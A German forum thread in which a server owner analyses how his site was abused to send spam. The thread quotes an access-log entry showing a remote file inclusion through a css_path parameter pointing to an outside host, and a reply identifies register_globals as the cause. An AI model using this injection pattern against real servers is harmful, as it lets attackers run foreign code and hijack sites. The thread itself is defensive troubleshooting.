Spammails über meinen Server

nightwatcher

Registered User
Nun bin auch ich betroffen gewesen.

S4Y haben ihre 39EUR verdient und ich bin einen schritt klüger ;)

Nun habe ich die Logfiles ausgewertet und wohl den Fehler gefunden.

Über eine POST Anfrage wurde ein Webmail Script eingebunden und darüber verschickt.

"POST /blabla/header.php?css_path=http://www.geocities.com/augustine_angel/CHAIRMAN.txt?? HTTP/1.1" 200 1083878 "http://www.meineurl.de/blabla/header.php?css_path=http://www.geocities.com/augustine_angel/CHAIRMAN.txt??" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

die Variable css_path wird in der Datein ganz normal angesprochen. Nicht über $_POST.

Ich bin mir eigentl. 100% sicher, das es dafür mal nen Update etc. gab oder liege ich da falsch.

Evtl. kann mir ja einer von euch auf die Sprünge helfen, ich bin grad bissel neben der Spur... :rolleyes:

Vielen Dank
 
Hallo!

die Variable css_path wird in der Datein ganz normal angesprochen. Nicht über $_POST.

Ich bin mir eigentl. 100% sicher, das es dafür mal nen Update etc. gab oder liege ich da falsch.

Nun, als Patch / Update würde ich das nicht bezeichnen. Das ist ein seit langem verfügbares Sicherheitsmerkmal von PHP. Du suchst nach dem Stichwort register_globals.

Gruß flyingoffice
 
Eben selbst wieder drauf gekommen, als ich paar Threads weiter unten nen Beitrag gelesen habe ;)

Danke. Bestätigt wenigstens meine alten Erinnerungen
 
Back
Top